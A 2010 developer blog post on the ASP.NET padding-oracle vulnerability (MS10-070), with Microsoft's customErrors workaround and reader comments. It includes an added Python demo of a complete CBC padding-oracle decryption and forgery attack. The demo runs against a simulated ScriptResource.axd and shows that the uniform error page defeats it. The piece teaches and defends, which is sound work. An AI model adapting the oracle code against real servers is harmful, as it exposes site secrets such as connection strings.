Update (01-Oct-2010): the ASP.NET security fix is now on Windows Update: http://weblogs.asp.net/scottgu/archive/2010/09/30/asp-net-security-fix-now-on-windows-update.aspx
Update (29-Sep-2010): the ASP.NET security update is now available: http://weblogs.asp.net/scottgu/archive/2010/09/28/asp-net-security-update-now-available.aspx
In this post I want to say something about the ASP.NET security vulnerability announced in September 2010.
This is a very serious bug in ASP.NET that lets an attacker pull sensitive information, such as database connection strings and appSettings values, out of an ASP.NET web site's web.config file. You can find more details about it here:
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
Here is the short version of how it works:
ASP.NET provides the handlers WebResource.axd and ScriptResource.axd (which one you look at doesn't really matter here); ScriptResource.axd can serve script files from your web application's file system to the browser. You can see this in action if you add something like this to your page:
<asp:ScriptManager runat="server" ID="ScriptManager1">
    <CompositeScript>
        <Scripts>
            <asp:ScriptReference Path="~/web.config" />
        </Scripts>
    </CompositeScript>
</asp:ScriptManager>
Here the path points at web.config, just to play with ASP.NET. Run the page and the rendered output contains a script tag something like this:
<script src="/ScriptResource.axd?d=ycEQiwETfhMZkd5o_11LpmI4L71eSrGrjB4WUQB-z1FK8JRkVG-jdqKKNagaDb36HarishQCm1xQtV_PFSt2W4qR16tUC0vymsWFdtmjwxg1&t=633677089732500000" type="text/javascript"></script>
The d parameter holds the address of the resource in encrypted form. So far so good. The trouble is that the server answers differently depending on whether the decrypted value had valid padding (a padding error versus an ordinary "not found" error). Those differing answers act as a padding oracle: by tampering with d byte by byte and watching the responses, an attacker can decrypt an existing d value, and forge a new one for any file he likes, without ever learning the encryption key. 🙁
How to prevent this:
The official recommendation is to return one identical error response for every kind of error, so the attacker gets no signal to work with. They suggest the following settings:
<configuration>
    <system.web>
        <customErrors mode="On" defaultRedirect="~/error.html" />
    </system.web>
</configuration>
or, scoped to just the two handlers:
<location path="WebResource.axd">
    <system.web>
        <customErrors defaultRedirect="~/error.html" mode="On" />
    </system.web>
</location>
<location path="ScriptResource.axd">
    <system.web>
        <customErrors defaultRedirect="~/error.html" mode="On" />
    </system.web>
</location>
This is enough to stop the information leak for now. Keep in mind that the padding oracle is not limited to these two handlers (any page that decrypts ViewState, a forms authentication ticket or a d= value can be probed the same way), so the application-wide setting is the safer choice; Scott's post also suggests, for .NET 3.5 SP1 and 4.0, using redirectMode="ResponseRewrite" and adding a small random delay in the error page so that timing differences do not leak either.
Back up the site more often until the fix from Microsoft is applied; the security update (MS10-070) is now out, see the links at the top of this post.
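To make the padding oracle concrete, here is an added example (my code, not from the original post, from Scott's blog or from Microsoft): a CBC padding-oracle attack against a simulated ScriptResource.axd, run once against a handler that leaks a distinct padding error and once against a handler that returns the single uniform error page the customErrors setting above produces. The block cipher is a toy Feistel network over SHA-256 built for the demo (ASP.NET used AES; the attack does not care which block cipher is behind CBC), the resource table and the error strings are constructed, and make_handler, make_oracle, recover_intermediate, decrypt_via_oracle, forge_via_oracle and demo are names I chose.

```python
# Added example (not the original post's code). Toy Feistel cipher built for the demo; ASP.NET used AES.
import hashlib
import os

BLOCK, ENC, DEC = 16, range(4), range(3, -1, -1)  # block size; round order for encrypt / decrypt

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(key, blk, rounds):  # 4-round Feistel network; decryption = same rounds in reverse
    l, r = blk[:8], blk[8:]
    for i in rounds:
        l, r = r, _xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return r + l

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, p = [iv], pad(plaintext)
    for i in range(0, len(p), BLOCK):
        out.append(_feistel(key, _xor(p[i:i + BLOCK], out[-1]), ENC))
    return b"".join(out)

def cbc_decrypt(key, ct):
    return unpad(b"".join(_xor(_feistel(key, ct[i:i + BLOCK], DEC), ct[i - BLOCK:i])
                          for i in range(BLOCK, len(ct), BLOCK)))

RESOURCES = {"~/site.js": "alert('hi')", "~/web.config": "<connectionStrings>...</connectionStrings>"}  # constructed
PADDING_ERROR = "500 Padding is invalid"        # what the unpatched handler leaks
UNIFORM_ERROR = "302 Redirect to ~/error.html"  # what customErrors mode=On returns instead

def make_handler(key, uniform_errors):  # stand-in for ScriptResource.axd: decrypt d=, then serve the file
    def handle(d):
        try:
            path = cbc_decrypt(key, d).decode("latin-1")
        except ValueError:
            return UNIFORM_ERROR if uniform_errors else PADDING_ERROR
        if path not in RESOURCES:
            return UNIFORM_ERROR if uniform_errors else "404 Not found"
        return "200 " + RESOURCES[path]
    return handle

def make_oracle(handler, failure_response):  # attacker's view: True unless the failure page comes back
    return lambda d: handler(d) != failure_response

def recover_intermediate(oracle, target):  # D_k(target) from yes/no answers; None if there is no signal
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padv = BLOCK - pos
        forged = bytearray(BLOCK)
        forged[pos + 1:] = bytes(b ^ padv for b in inter[pos + 1:])  # known bytes decrypt to the pad value
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1 and not oracle(bytes(forged[:-2]) + bytes([forged[-2] ^ 1, guess]) + target):
                continue  # flipping byte 14 broke it: an accidental 02 02 (or 03 03 03) match, not 01
            inter[pos] = guess ^ padv
            break
        else:
            return None
    return bytes(inter)

def decrypt_via_oracle(oracle, ct):  # read a captured d= value without the key
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    inters = [recover_intermediate(oracle, b) for b in blocks[1:]]
    if None in inters:
        return None
    return unpad(b"".join(_xor(i, p) for i, p in zip(inters, blocks)))

def forge_via_oracle(oracle, plaintext):  # build a d= that decrypts to plaintext, last block first
    p, out = pad(plaintext), [bytes(BLOCK)]
    for i in range(len(p) - BLOCK, -1, -BLOCK):
        inter = recover_intermediate(oracle, out[0])
        if inter is None:
            return None
        out.insert(0, _xor(inter, p[i:i + BLOCK]))
    return b"".join(out)

def demo():
    key = os.urandom(16)  # server secret; the attacker never sees it
    vuln, safe = make_handler(key, False), make_handler(key, True)
    d = cbc_encrypt(key, os.urandom(BLOCK), b"~/site.js")  # legitimate d= from a rendered page
    vuln_oracle, safe_oracle = make_oracle(vuln, PADDING_ERROR), make_oracle(safe, UNIFORM_ERROR)
    return {
        "decrypt_vuln": decrypt_via_oracle(vuln_oracle, d),
        "forge_vuln": vuln(forge_via_oracle(vuln_oracle, b"~/web.config")),
        "forge_safe": forge_via_oracle(safe_oracle, b"~/web.config"),
    }

if __name__ == "__main__":
    print(demo())
```

Running it shows the two sides of the story: against the leaky handler the attacker recovers the plaintext of a captured d value and forges a d that makes the handler hand over "~/web.config", using at most 256 requests per byte and never touching the key; against the handler that answers every failure with the same error page, valid padding with an unknown path and invalid padding look identical, the byte search finds nothing, and both attacks return None. That is exactly why the official workaround insists on one identical error response for everything.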
Get clear details about this from here:
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
http://devnet.kentico.com/Blogs/Martin-Hejtmanek/September-2010/How-ASP-NET-Security-Vulnerability-affects-Kentico.aspx — this cool and clear!
Enjoy while coding..!
Thanks,
Naga Harish.
I really enjoy reading your blog. Great work and keep it up.
Thanks for your comment. Sure, I will keep continuing the same!
Very impressed with this article, thanks for the solid information.
Thanks Cyprian, I too got the information from ScottGu's blog (official; he is a Microsoft employee). 🙂
I really like the work that has gone into making the post. I will be sure to tell my blog buddies about your content keep up the good work. Thanks